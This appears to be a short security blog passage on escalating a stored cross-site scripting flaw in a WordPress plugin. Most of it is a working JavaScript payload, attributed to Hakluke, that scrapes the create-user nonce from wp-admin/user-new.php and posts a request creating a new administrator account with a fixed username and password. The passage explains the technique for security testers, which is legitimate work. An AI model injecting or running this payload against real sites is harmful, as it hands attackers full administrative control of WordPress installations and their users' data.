When identifying a Wordpress site that is vulnerable to cross-site scripting, there are some well documented payloads and resources out there which increase the severity if an Administrator were to trigger the payload. For example, if a stored cross-site scripting vulnerability affects a plugin. The following is a snippet of a Hakluke payload linked below which attempts to create a new administrator user:
var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
req.send();
var nonce = regex.exec(req.responseText);
var nonce = nonce[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
